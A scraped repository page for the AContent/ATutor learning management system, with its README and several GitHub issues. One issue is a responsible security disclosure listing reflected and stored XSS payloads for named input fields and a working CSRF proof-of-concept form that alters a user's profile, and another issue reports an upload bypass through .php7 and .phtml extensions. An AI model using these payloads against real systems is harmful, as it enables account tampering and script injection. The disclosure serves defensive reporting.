Code Monkey home page Code Monkey logo

acontent's Introduction

ATutor Readme:

About

ATutor is a learning management system to continue professional development for teachers, career developers, and academic research. It is written in PHP in a cross platform operating system.

Features

Two accessibility features in the system are text alternatives for all visual elements and keyboard access to all elements of the program. With these features, a blind person can listen to the entire interface of the system with the help of a screen reader, and he or she can access the system without needing a mouse. These features also allow ATutor to adapt to a wide variety of technologies including cell phones, personal data assistants (PDAs), and text-based Web browsers, to name a few. ATutor is also designed for adaptability to any of several teaching and learning scenarios. There are four main areas that reflect this design principle: themes, privileges, tool modules, and groups

Installation

To install ATutor, point your web browser to the installation directory where ATutor was extracted, and follow the Installer's instructions. e.g. http://localhost/ATutor

For full installation instructions see: https://atutor.github.io/atutor/docs/installation

Installing from a Github Clone

  1. Fork ATutor into your own Github account, at: https://github.com/atutor/ATutor

  2. Clone ATutor from the fork you created into the document root of your webserver (for convenience), with:git clone https://github.com/yourname/ATutor.git

  3. Before running the Installer, create an empty config.inc.php file in the ATutor/include/ directory. If you have a command line to work from, while located in the ATutor directory, create the file with: touch include/config.inc.php

  4. Follow the installation instructions at the link above.

  5. Or, follow the instructions given by the ATutor Installer.

How to contribute

If you want to contribute to ATutor follow the instructions below or on https://atutor.github.io/atutor/docs/dev_with_github.html

  1. Fork the repository and create clone
  2. Create a new branch to work in
  3. Edit and create new files within your new branch
  4. Make sure your branch is up to date with the master branch
  5. Merge pull requests into master branch

For additional ATutor documentation, see the ATutor Handbook in ATutor, or at the following links:

Developers

  • Inclusive Design Research Centre
  • OCAD University
  • ATutorSpaces

License

GPL

Website Link

Report Issues

Have fun, and take it places!

-Greg

acontent's People

Contributors

anvk avatar atutorlangs avatar catiaprandi avatar cindyli avatar gregrgay avatar harriswong avatar matteoceppini avatar mayankgupta avatar pasindud avatar sudwebdesign avatar supungs avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

harriswong cindyli iam-tj bolognaeat donadiomauro jasonhrmeier anvk gupta-manish dhruvj supungs mayankgupta jacano1969 kreso andrepens1991 laviniamosut riccardoguglielmo chibuisimaduka yahani abhishekmittal09 ayushdatt rahulrockers digideskio sudwebdesign gdometrics illuminate3 metamorfosec joachimwlodarz evopimp

acontent's Issues

XSS and CSRF issues on v1.4

Hello...
I have found XSS and CSRF issues in atutor/AContent v1.4.
I used AContent 1.4 Demo on your official website.
Please let me know if you need additional information.
I hope this is a right channel to disclose security issues because you requested to post any bugs to this GitHub Page.
Regards.

Findings

XSS (Reflected)

https://atutordemos.000webhostapp.com/acontent/documentation/index.php?p="><script>alert(document.domain)</script>

XSS (Stored)

1 (editor/edit_content_folder.php)

  1. In the Content Folder Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
  2. Please click Delete Content Icon to trigger the JS alert

2 (editor/edit_content.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
  2. Please click Delete Content Icon to trigger the JS alert

3 (editor/edit_content.php)

  1. In the Title Field with HTML format selected, please enter any clickable name. For example, <script>test</script>.
  2. In the Body, please enter <script>alert(document.domain)</script>
  3. Click Preview Button to trigger the JS alert
  4. Click Save Button
  5. Click <script>test</script> to trigger the JS alert again

4 (tests/edit_test.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert

5 (tests/edit_question_likert.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Preview or Delete Button
  4. Every time when we on Question Bank (tests/question_db.php), JS alert also triggered

6 (tests/create_question_matchingdd.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

7 (tests/create_question_matching.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

8 (tests/create_question_multianswer.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

9 (tests/create_question_multichoice.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

10 (tests/create_question_long.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

11 (tests/edit_question_ordering.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

12 (tests/edit_question_truefalse.php)

  1. In the Statement Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Preview or Delete Button

13 (tests/question_cats_manage.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Press Enter or click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Delete Button

14 (course/course_property.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Press Enter or click Save Button to trigger the JS alert

CSRF

  1. Login at official website.
  2. Save HTML code below and give it a name, e.g. CSRF_Payload.html.
  3. Open and execute the payload on the same browser by clicking the CLICK ME Button
<html>
	<form method="post" action="https://atutordemos.000webhostapp.com/acontent/profile/index.php" name="form">
		<input name="password_error" type="hidden">
		<input type="hidden" name="form_password_hidden" value="">
		<input id="first_name" name="first_name" type="hidden" value="FIRST NAME">
		<input id="last_name" name="last_name" type="hidden" value="LAST NAME">
		<input type="checkbox" style="display:none" name="is_author" id="is_author" checked="checked" onclick="if (this.checked) jQuery('#table_is_author').show('slow'); else jQuery('#table_is_author').hide('slow');">
		<input id="organization" name="organization" type="hidden" size="50" maxlength="100" value="ORGANIZATION">
		<input id="phone" name="phone" type="hidden" size="30" maxlength="30" value="PHONE">
		<input id="address" name="address" type="hidden" size="50" maxlength="100" value="ADDRESS">
		<input id="city" name="city" type="hidden" size="30" maxlength="30" value="CITY">
		<input id="province" name="province" type="hidden" size="30" maxlength="30" value="PROVINCE">
		<input id="country" name="country" type="hidden" size="30" maxlength="30" value="COUNTRY">
		<input id="postal_code" name="postal_code" type="hidden" size="10" maxlength="10" value="POSTAL CODE">
		<!-- Click the button to execute this CSRF Payload -->
		<input type="submit" name="submit" value="CLICK ME" class="submit">
	</form>
</html>

Suggested Mitigations

  1. For XSS issues, we can use input validation and escape function for all user supplied inputs. I see you made special characters become like &lt;script&gt;alert(document.domain)&lt;/script&gt; on certain places, but no on many other places and therefore still vulnerable to XSS.
  2. For CSRF issue, we can use CSRF Token. It would be better if Change Password and Change Email Address also use CSRF Token.

get_result alternative needed

get_result() is only available when the mysqlind module is installed. This was a problem when trying to setup on http://atutordemos.x10host.com.

AContent/include/classes/DAO/DAO.class.php

Line 84 in 9ff6ac5

$result = $stmt->get_result();

I did find a piece of code (function get_result()) that returns an array, but the output needs to be a $stmt->execute() object.

Here's where the piece of code came from:
https://stackoverflow.com/questions/10752815/mysqli-get-result-alternative

What can be done to mimic $mysqli->get_result?

File Extension Upload Bypass

Running with default configuration, this application does not list .php7 or .phtml as illegal extensions. This allows for potentially malicious PHP files to be uploaded and executed by this server. While I understand this application is no longer maintained I recommend anyone running the application to include these two files extensions in the "illegal file extensions" area of admin settings

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.